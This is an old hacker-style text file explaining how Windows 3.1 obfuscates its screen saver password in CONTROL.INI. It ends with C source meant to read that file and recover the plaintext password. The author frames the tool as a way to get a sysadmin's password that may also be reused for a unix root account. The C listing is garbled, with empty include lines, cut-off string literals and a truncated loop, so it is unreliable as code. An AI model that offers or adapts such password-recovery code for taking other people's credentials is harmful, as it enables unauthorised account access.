How does the Microsoft Windows 3.1 Password Encryption work?

The password option in Microsoft Windows 3.1 is easily defeated, but there are those of us who really want to know how Microsoft does this. There are many reasons why knowing the actual password can be useful. Suppose a sysadmin used the same password in the windows screen saver as his root account on a unix box.

Anyway, I will attempt to relay what I have learned about this algorithm.

I will describe the process starting after you've entered the password and hit the [OK] button.

I will make the assumtion that everyone (at least those interested) know what the XOR operation is.

First, the length of the password is saved. We'll call this 'len'. We will be moving characters from the entered string into another string as they are encrypted. We'll call the originally entered password 'plaintext' and the encrypted string(strings--there are two passes) 'hash1' and 'hash2.' The position in the plaintext is important during the process so we'll refer to this as 'pos.' After each step of the hashing process, the character is checked against a set of characters that windows considers 'special.' These characters are '[ ] =' and any character below ASCII 33 or above ASCII 126. I'll refer to this checking operation as 'is_ok.' All indecies are zero-based (i.e. an 8 character password is considered chars 0 to 7).

Now, the first character of 'plaintext' is xor'd with 'len' then fed to 'is_ok'. if the character is not valid, it is replaced by the original character of 'plaintext' before going to the next operation. The next operation is to xor with 'pos' (this is useless for the first operation since 'len' is 0 and anything xor'd with zero is itself) then fed to 'is_ok' and replaced with the original if not valid. The final operation (per character) is to xor it with the previous character of 'plaintext'. Since there is no previous character, the fixed value, 42, is used on the first character of 'plaintext'. This is then fed to 'is_ok' and if OK, it is stored into the first position of 'hash1' This process proceeds until all characters of plaintext are exhausted.

The second pass is very similar, only now, the starting point is the last character in hash1 and the results are placed into hash2 from the end to the beginning. Also, instead of using the previous character in the final xoring, the character following the current character is used. Since there is no character following the last character in hash1, the value, 42 is again used for the last character.

'hash2' is the final string and this is what windows saves in the file CONTROL.INI.

To 'decrypt' the password, the above procedure is just reversed.

Now, what you've all been waiting for. Here is some C code that will do the dirty work for you:

#include
#include
#include

int xor1(int i,int j)
{
int x;

x=i^j;
return (x>126||x<33||x==91||x==93||x==61)?i:x;
}
void main()
{
FILE *f;
int i,l;
char s[80],s1[80];

printf("Please enter the path to your Windows directory\n
gets(s1);
sprintf(s,"%s%scontrol.ini",s1,s1[strlen(s1)-1]=='\\'?"":"\\
if((f=fopen(s,"rt"))==NULL){
printf("File Error : %s\n",sys_errlist[errno]);
exit(0);
}
while(strnicmp(fgets(s1,70,f),"password",8)!=0&&!feof(f));
fclose(f);
strtok(s1,"=\n
strcpy(s,strtok(NULL,"\n"));
i=strlen(s)-1;
for(l=i;l>-1;l--)
s1[l]=xor1(xor1(xor1(s[l],l==i?42:s[l+1]),l==i?0:l),i+1);
for(l=0;l s[l]=xor1(xor1(xor1(s1[l],l?s1[l-1]:42),l?l:0),i+1);
printf("The Password is: %s\n",s);
}